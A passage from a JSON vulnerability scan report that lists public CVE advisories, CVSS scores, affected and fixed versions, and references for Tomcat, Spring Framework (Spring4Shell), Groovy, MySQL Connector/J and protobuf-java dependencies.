List","url":"https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"NetApp Advisory ntap-20200327-0005","url":"https://security.netapp.com/advisory/ntap-20200327-0005"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1935/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-45648"]}],"cve":"CVE-2023-45648","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-10-10T21:31:12","ids":[{"system_name":"CVE Record","text":"CVE-2023-45648"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. 
A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue. ## Related CVE(s) BIT-tomcat-2023-45648, CVE-2023-45648"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/10"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory 
dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-45648/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code 
Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. ## Impact A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency ## Patches - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12) ## Workarounds For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting. To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. 
In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework/spring-webmvc@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-17521"]}],"cve":"CVE-2020-17521","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2020-12-09T19:03:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-17521"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201218-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Groovy"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Groovy Apache Groovy provides 
extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2."}],"product_status":{"known_affected":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"],"known_not_affected":["org.codehaus.groovy/groovy@2.4.21"]},"references":[{"summary":"Cve 2020","url":"https://groovy-lang.org/security.html#CVE-2020-17521"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4b2f13c302eec98838ff7475253091fb9b75bc1038016ba00ebf6c08@%3Cdev.atlas.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra9dab34bf8625511f23692ad0fcee2725f782e9aad6c5cdff6cf4465@%3Cnotifications.groovy.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea63a4666ba245d2892471307772a2d8ce0f0741f341d6576625c1b3@%3Cdev.atlas.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"NetApp Advisory ntap-20201218-0006","url":"https://security.netapp.com/advisory/ntap-20201218-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle 
Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"]}],"title":"CVE-2020-17521/pkg:maven/org.codehaus.groovy/groovy@2.4.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21363"]}],"cve":"CVE-2022-21363","cwe":{"id":"280","name":"Improper Handling of Insufficient Permissions or Privileges "},"discovery_date":"2022-01-20T00:00:48","ids":[{"system_name":"CVE Record","text":"CVE-2022-21363"},{"system_name":"Oracle Advisory","text":"cpujan2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java"},{"category":"details","details":"Vulnerability Details","text":"# Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. 
Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]}],"title":"CVE-2022-21363/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-2471"]}],"cve":"CVE-2021-2471","cwe":{"id":"863","name":"Incorrect Authorization"},"discovery_date":"2022-05-24T19:18:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-2471"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle 
Advisory","text":"cpuoct2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Incorrect Authorization in MySQL Connector Java"},{"category":"details","details":"Vulnerability Details","text":"# Incorrect Authorization in MySQL Connector Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"],"known_not_affected":["mysql/mysql-connector-java@8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"]}],"title":"CVE-2021-2471/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22570"]}],"cve":"CVE-2021-22570","cwe":{"id":"476","name":"NULL Pointer Dereference"},"discovery_date":"2022-01-27T00:01:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-22570"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20220429-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"NULL Pointer Dereference in Protocol Buffers"},{"category":"details","details":"Vulnerability Details","text":"# NULL Pointer Dereference in Protocol Buffers Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater. 
## Related CVE(s) CVE-2021-22570, PYSEC-2022-48"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.15.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00019.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DVUZPALAQ34TQP6KFNLM4IZS6B32XSA"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PAGL5M2KGYPN3VEQCRJJE6NA7D5YG5X"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BTRGBRC5KGCA4SK5MUNLPYJRAGXMBIYY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IFX6KPNOFHYD6L4XES5PCM3QNSKZBOTQ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KQJB6ZPRLKV6WCMX2PRRRQBFAOXFBK6B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRWRAXAFR3JR7XCFWTHC2KALSZKWACCE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NVTWVQRB5OCCTMKEQFY5MYED3DXDVSLP"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"NetApp Advisory ntap-20220429-0005","url":"https://security.netapp.com/advisory/ntap-20220429-0005"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22570/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3510"]}],"cve":"CVE-2022-3510","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3510"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. 
We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3510/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3509"]}],"cve":"CVE-2022-3509","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3509"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a 
denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3509/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"GitHub","urls":["https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"]}],"cve":"CVE-2022-3171","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-10-04T22:17:15","ids":[{"system_name":"CVE Record","text":"CVE-2022-3171"},{"system_name":"GitHub Advisory","text":"GHSA-h4h5-3hr4-j3g2"},{"system_name":"Gentoo 
Advisory","text":"glsa-202301-09"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"protobuf-java has a potential Denial of Service issue"},{"category":"details","details":"Vulnerability Details","text":"# protobuf-java has a potential Denial of Service issue ## Summary A potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. Reporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771) Affected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime. 
